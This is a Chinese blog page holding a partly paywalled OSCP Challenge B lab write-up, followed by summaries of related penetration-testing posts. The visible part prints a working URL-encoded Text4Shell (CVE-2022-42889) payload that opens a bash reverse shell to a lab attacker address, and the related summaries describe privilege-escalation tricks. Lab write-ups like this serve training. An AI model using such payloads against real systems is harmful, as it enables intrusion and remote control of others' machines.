OSCP Challenge B

已于 2023-09-11 16:23:37 修改
阅读量2.7k 收藏
点赞数 2
分类专栏: OSCP 2023 lab writeup 文章标签: 网络
于 2023-09-11 16:20:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/fuckskyboy/article/details/132811717
版权
本文详细记录了渗透测试过程,涉及反弹shell、端口映射、漏洞利用、提权等技术。通过web服务、SNMP、FTP、SSH、SMB等通道,利用Apache Commons Text漏洞、FreeSWITCH RCE、Juicy Potato等工具,实现了多个目标系统的权限提升,包括Windows和Linux环境。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

192.150

8080端口有web,跑一下目录

CHANGELOG和search

Apache Commons Text 1.8——CVE-2022-42889

/search?query=%24%7bscript%3ajavascript%3ajava.lang.Runtime.getRuntime().exec('%2fbin%2fbash%20-c%20bash%24IFS%249-i%3e%26%2fdev%2ftcp%2f192.168.45.188%2f4444%3c%261')%7d

反弹shell成功后,通过命令查看当前服务,发现该主机有监听本机的8000端口,通过ps查询

<

了解本专栏 订阅专栏 解锁全文
Challenge 5 - OSCP B
羽的博客
03-14 2388
jdwp可以执行命令,但是这个脚本需要python2来运行,靶机上没有,那么我们只能将8000端口代理出来了,我这里代理到我本地的7800端口上。访问8080端口显 hostname,我们通过nmap可以看到hostname为ms01.oscp.exam,修改/etc/hosts。试了下impacket-smbexec没有成功, 不过他开放了22端口,我们可以ssh登录web_svc用户。得到下面的结果,root用户运行了一个貌似是debug的进程。nmap扫描发现了一个可以的端口8021。
OSCP-Challenge 1 - Medtech
羽的博客
03-14 5475
122靶机进入/home/mario/.ssh目录下,发现存在id_rsa,用这个逐个登录内网靶机,发现14的成功进入。现在我们通过代理可以扫描内网的其他机器了,扫了下10-14、83、83开放的端口基本差不多,发现都有5985。如果可以看到的话,那就简单了,直接覆盖成shell文件就可以了,然后等待反弹。登录后发现限制了命令的执行,但是help了一下,发现了哪些可以用的命令。咨询了一下是dns的问题,修改dns的ip位域的ip,也就是10的ip。接着上mimikatz来获取一些明文信息,但是失败了。
OSCP-Challenge 2 - Relia
羽的博客
03-14 4437
使用andrea:PasswordPassword_6登录远程桌面,在c盘根目录下发现一个计划任务的ps,文件,修改执行的exe位木马,获取到milana用户的反弹shell。,发现开放了一个8000端口,但是我们外部是访问不到的,它对应的页面是/var/www/internal/,这个目录下的文件我们是可以访问的,把这个文件打个包放到本地分析下。其中数据的可以直接连接mssql,但是端口是49965,不过在数据库中没发现什么可用的信息,但是可以修改密码直接进后台,这个可以先放放。
OSCP challenge C
fuckskyboy的博客
09-19 2661
2023 OSCP challenge C writeup
Offensive Security OSCP .pdf
11-07
Offensive Security OSCP
OSCP系列-lab-Shocker
EdSu12138的博客
04-16 280
简单来说就是这个目录我无法直接访问 但是可以试试直接去访问他这目录下的文件 然后枚举文件名 这么个操作。可以以root权限来执行perl,通过perl执行任何命令. perl是一门编程语言。利用这个语言启动bash 因为这个语言 又是有sudo权限 所以就可以提权。其实对于这个漏洞最开始 完全不知道 属于做了这个靶机才知道这个漏洞。一堆403 只有个cgi-bin目录 看起来有点用。内网: 靶机 10.10.10.56。然后提权 先看看能够提权的方式。成功getshell。
OSCP 2023 challenge Writeup-Medtech
热门推荐
fuckskyboy的博客
08-26 1万+
OSCP lab writeup
OSCP心得
fuckskyboy的博客
09-30 2197
OSCP 2023考试通过经验分享
OSCP Challenge A
fuckskyboy的博客
09-05 3930
2023 OSCP challenge A的writeup
APM32芯得 EP.07 | 探索使用以太网(ETH),搭建一个简单的本地HTTP服务器
cheukyau的博客
06-03 570
本文分享基于APM32系列芯片的ETH模块HTTP服务实现方法。文章详细介绍了HTTP协议特点、LWIP1.4.1的轻量级HTTP服务实现,以及嵌入式Web服务器搭建步骤:1)移植LWIP库;2)使用makefsdata工具转换HTML文件;3)编写httpd_cgi_ssi.c实现SSI和CGI功能,包括ADC数据采集和LED控制;4)配置开发板静态IP地址。实验现象展示了通过网页访问开发板IP地址,实现LED控制和ADC数据采集功能。
仓颉语言---Socket编程
w_zero_one的博客
06-02 968
Socket(套接字)可以被理解为网络上两个进程之间通信的端点。它是网络通信的抽象表示,封装了底层网络协议的复杂性,为应用程序提供了一个简单统一的接口。Socket 编程是一种网络编程范式,它允许不同计算机上的进程通过网络进行通信。这种通信可以发生在同一设备上的不同进程之间,也可以发生在不同地理位置的设备之间。Socket 编程提供了一种标准的方式来实现网络通信,是构建各种网络应用的基础。
【计算机网络】第七章 运输层
wuyufei_sun的博客
06-03 418
物理层、数据链路层和网络层,共同解决了将主机通过异构网络互联起来所面临的问题,实现了在计算机网络中实际进行通信的真正实体,是位于通信两端主机中的进程如何为运行在提供直接的逻辑通信服务,就是运输层的主要任务。运输层协议又称为端到端协议。
K-匿名模型
qq_65213554的博客
06-02 1107
K-匿名模型是一种隐私保护技术,通过数据泛化和抑制操作,确保发布数据中的每条记录至少与其他K-1条记录在准标识符(QIDs)上不可区分,防止个体被重新识别。其核心是抵御链接攻击,适用于医疗、普查等敏感数据的公开场景。虽然K-匿名平衡了数据效用与隐私,但仍面临同质性攻击、背景知识攻击等局限。后续改进模型如L-多样性和T-接近性增强了防护,但过度泛化导致的数据效用下降和动态数据失效仍是挑战。该技术直观易实现,但在实际应用中需权衡隐私保护与数据分析需求。
探索Heal项目的独特魅力:提高工作效率的简易指南
weixin_44626085的博客
06-04 408
今天,我们要介绍的项目名为 “Heal”,它展示了一个完整的漏洞利用流程,从信息收集到最终获取服务器的控制权,全程步步为营。在破解了用户的哈希值后,获取到了能够利用LimeSurvey 插件系统上传并安装恶意插件的权限,获得了更多的对目标服务器的访问权限。在开始进行安全测试之前,了解目标服务器的基本信息是非常重要的,因此Heal项目从最初的网络扫描开始,使用nmap工具发现开放的TCP端口:22(SSH)和80(HTTP)。这样的扫描在发现开放端口之后,接下来就是对服务版本的探查和可能存在漏洞的挖掘。
Linux系统配置网络优先级
阿杰的博客
06-01 376
在Linux系统中,可通过metric值调整默认网关优先级(数值越小优先级越高)。提供两种配置方法: nmcli:适用于NetworkManager管理的网络,使用nmcli connection modify设置ipv4.route-metric(如以太网100,WiFi 200),并重启连接生效。 Netplan(Ubuntu推荐):编辑YAML文件,禁用DHCP自动路由,手动定义routes并指定metric(如以太网100、WiFi 200),最后执行netplan apply。验证优先级可
HCIP(BGP基础)
2301_80632830的博客
06-03 948
簇列表--AS_path---每经过一个反射器的反射均会添加该反射器的RID(簇ID)到簇列表中,之 后设备一旦收到一条IBGP路由时,如果路由携带的簇ID和自身设备的簇ID一致,那么将拒绝 学习该路由。起源者ID--在一个AS内部反射路由的源头设备的RID--当设备产生反射路由时如果没有起源者ID 那么将添加该属性,如果反射器反射路由时该路由已经存在起源者ID那么将仅反射。update报文--更新报文用来承载BGP路由信息的报文。open报文---建立BGP对等体。
https和http有什么区别-http各个版本有什么区别
有时间就写写代码
06-04 230
HTTP协议从0.9到3.0版本经历了多次进化:0.9版本仅支持GET请求;1.0引入请求头但需重复建立连接;1.1通过持久连接优化性能但仍存在队头阻塞;2.0采用二进制协议和多路复用大幅提升效率;3.0基于QUIC协议使用UDP传输,进一步降低延迟并强制加密。HTTPS是HTTP的安全版本,通过SSL/TLS加密数据,使用443端口,适用于敏感信息传输,而HTTP(80端口)则用于普通网页浏览。这些技术演进使网络传输更高效、更安全。
【计网】第六章(网络层)习题测试
wuyufei_sun的博客
06-01 1073
1.A与Router0之间的链路MTU = 1500字节,减去20字节的IP数据报首部,IP数据报的最大负载为1480字节,而1480 / 8 = 185,可以整除,因此用4080 / 1480 = 2 ……该路由器收到了5个IP数据报,其目的地址分别如下,请根据路由表信息,判断其下一跳(注意:需要路由器间接交付的填写下一跳IP地址x.x.x.x,直接交付的填写具体接口)?最终,这个由主机A生成的长度为4080字节的UDP报文到达主机B时,以 个IP分组的形式出现。
day33-系统编程之 信号通信II 及 网络编程
最新发布
m0_71289080的博客
06-04 516
OSI 模型 ===》开放系统互联模型 ==》分为7层:理想模型 ==》尚未实现tftpa /etc/123//此七层,自下向上看应用层表示层加密解密 gzip会话层网络断开,连接状态,keep-close keep-alive传输层tcp协议//可靠传输方式,但网络延迟大 udp协议//不可靠传输方式,可能会数据缺失,但网络延迟低,开销小 传输:文件(TCP) (实时性,UDP) 视频,音频网路层ip NAT链路层。
oscp challenge
01-11
### OSCP 考试挑战与资源 对于准备 Offensive Security Certified Professional (OSCP) 认证考试的人来说,理解并准备好应对各种类型的渗透测试挑战至关重要[^1]。这些挑战通常涉及网络扫描、漏洞分析、利用已知安全缺陷以及编写自定义exploit。 #### 官方平台提供支持材料 官方提供了Pentester Lab练习环境来帮助考生熟悉真实世界的攻击场景和技术应用方法[^2]。此外还有在线论坛可以供学员交流心得技巧,解答疑问困惑之处。 #### 社区贡献的学习资料 互联网上存在大量由社区成员创建分享出来的指南文档和视频教程,它们能够补充官方教材之外的知识点覆盖范围,并给出更多实战案例解析[^3]。例如HackTheBox 和 TryHackMe 平台都拥有丰富的虚拟机靶场用于模拟不同难度级别的攻防演练项目;而像Reddit r/netsec subreddit这样的社交网站板块则经常会有经验丰富的专业人士发表见解文章或是推荐优质学习路径。 ```bash # 使用Nmap进行基本端口扫描的例子 nmap -sS -p- target_ip_address ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

fuckskyboy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值